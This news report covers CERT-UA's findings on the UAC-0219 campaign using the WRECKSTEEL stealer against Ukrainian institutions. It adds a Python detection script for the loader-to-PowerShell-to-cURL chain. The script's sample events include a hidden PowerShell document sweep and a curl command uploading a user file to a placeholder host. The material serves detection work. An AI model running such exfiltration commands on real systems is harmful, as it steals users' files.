In a concerning development, CERT-UA, Ukraine’s Computer Emergency Response Team, has reported a series of cyberattacks attributed to the hacker group identified as UAC-0219.
These attacks, which have been ongoing since the fall of 2024, utilize an advanced PowerShell-based malware tool named WRECKSTEEL to infiltrate computers and extract sensitive data.
The primary targets include government agencies and critical infrastructure facilities across Ukraine.
The cyber espionage campaign employs a multi-stage attack mechanism.
Initially, compromised accounts are used to distribute phishing emails containing links to public file-sharing services such as DropMeFiles and Google Drive.
These links often appear in PDF attachments and lead victims to download VBScript loaders disguised as “.js” files.
Once executed, these scripts deploy a PowerShell payload designed to search for specific file types such as “.doc”, “.pdf”, “.xlsx”, and “.jpeg” and upload them using cURL commands.
Additionally, the malware captures screenshots of infected computers to further enhance data collection capabilities.
CERT-UA’s analysis reveals that earlier versions of this malware relied on EXE files created with the NSIS installer, which included decoy documents and tools like the IrfanView graphics editor for screenshot capture.
However, since 2025, the screenshot functionality has been fully integrated into the PowerShell script itself, demonstrating an evolution in the attackers’ tactics.
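The delivery chain described above (a script host running a ".js"-named loader, which spawns PowerShell, which enumerates document types and hands them to cURL) leaves a recognisable parent/child process trail. The following detection logic is an added example written for this page, not CERT-UA's published detection content or any tooling from the report; it runs over constructed Sysmon-style process-creation events (the field names `pid`, `ppid`, `image`, `parent_image`, `cmdline` and all sample values are assumptions) and flags each link of the chain separately, then confirms that a cURL upload descends from a script host by walking the process ancestry.

```python
# Added example: process-chain detection for a WRECKSTEEL-like delivery pattern.
# Not CERT-UA code. Field names and sample events below are constructed assumptions.

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
DOC_EXTS = (".doc", ".pdf", ".xlsx", ".jpeg")          # file types named in the report
UPLOAD_FLAGS = ("-F", "--form", "-T", "--upload-file", "--data-binary")

# Constructed sample telemetry (Sysmon Event ID 1 style). Hosts, users and URLs are fictional.
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 3980, "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\userinit.exe", "cmdline": r"explorer.exe"},
    {"pid": 4210, "ppid": 4100, "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'wscript.exe "C:\Users\u\Downloads\report.js"'},
    {"pid": 4300, "ppid": 4210,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'powershell.exe -nop -w hidden -c "Get-ChildItem -Path C:\Users -Recurse -Include *.doc,*.pdf,*.xlsx,*.jpeg"'},
    {"pid": 4350, "ppid": 4300, "image": r"C:\Windows\System32\curl.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'curl.exe -s -F "file=@C:\Users\u\Documents\budget.xlsx" https://example.invalid/upload'},
    # Benign control: a plain download launched from Explorer should not fire.
    {"pid": 5000, "ppid": 4100, "image": r"C:\Windows\System32\curl.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"curl.exe -O https://example.invalid/tool.zip"},
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Image names of the process's ancestors, nearest parent first."""
    by_pid = {ev["pid"]: ev for ev in events}
    chain, seen = [], set()
    cur = by_pid.get(pid)
    while cur is not None:
        parent_pid = cur["ppid"]
        if parent_pid in seen or parent_pid not in by_pid:
            break                       # top of the known tree, or a pid cycle
        seen.add(parent_pid)
        cur = by_pid[parent_pid]
        chain.append(basename(cur["image"]))
    return chain


def analyze(events):
    """Return (pid, reason) alerts for each suspicious link in the chain."""
    alerts = []
    for ev in events:
        img = basename(ev["image"])
        parent = basename(ev["parent_image"])
        cmd = ev["cmdline"]
        lower = cmd.lower()

        # Link 1: a VBScript/JScript host launching PowerShell.
        if parent in SCRIPT_HOSTS and img == "powershell.exe":
            alerts.append((ev["pid"], "script host spawned PowerShell"))

        # Link 2: PowerShell recursively enumerating several document types at once.
        if img == "powershell.exe":
            hit = [e for e in DOC_EXTS if e in lower]
            if "-recurse" in lower and len(hit) >= 2:
                alerts.append((ev["pid"], "recursive document enumeration (%s)" % ", ".join(hit)))

        # Link 3: PowerShell driving a cURL upload (not a download).
        if img == "curl.exe" and parent == "powershell.exe":
            if any(tok in UPLOAD_FLAGS for tok in cmd.split()):
                alerts.append((ev["pid"], "PowerShell-driven curl upload"))
                # Confirm the whole chain: does the upload descend from a script host?
                if any(a in SCRIPT_HOSTS for a in ancestry(events, ev["pid"])):
                    alerts.append((ev["pid"], "upload descends from a script host"))
    return alerts


if __name__ == "__main__":
    for pid, reason in analyze(SAMPLE_EVENTS):
        print(pid, reason)
```

Each rule fires on its own so that a partially observed chain (for example, only the cURL upload when script-block logging is missing) still surfaces; the ancestry walk is what ties the individual hits back to the phishing-delivered loader, and it is also where the benign Explorer-launched download in the sample is correctly left alone.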
The WRECKSTEEL malware is central to these operations and exists in both VBScript and PowerShell variants.
Its primary function is to systematically steal files from compromised systems.
The malware’s design reflects a high level of sophistication, allowing it to evade detection while efficiently gathering targeted data.
CERT-UA has tracked this activity under the identifier UAC-0219 and warns that similar tools may be deployed in future attacks against other critical sectors.
The ongoing cyberattacks highlight the persistent threat posed by UAC-0219 and similar groups.
CERT-UA emphasizes the importance of vigilance among organizations handling sensitive information.
Indicators of compromise (IoCs), including malicious scripts and network addresses associated with these attacks, have been shared publicly to aid in detection efforts.
Organizations are urged to report any signs of compromise immediately to CERT-UA for rapid response and mitigation measures.
As Ukraine continues to face cyber threats targeting its critical infrastructure, CERT-UA remains committed to analyzing incidents and providing timely updates on emerging risks.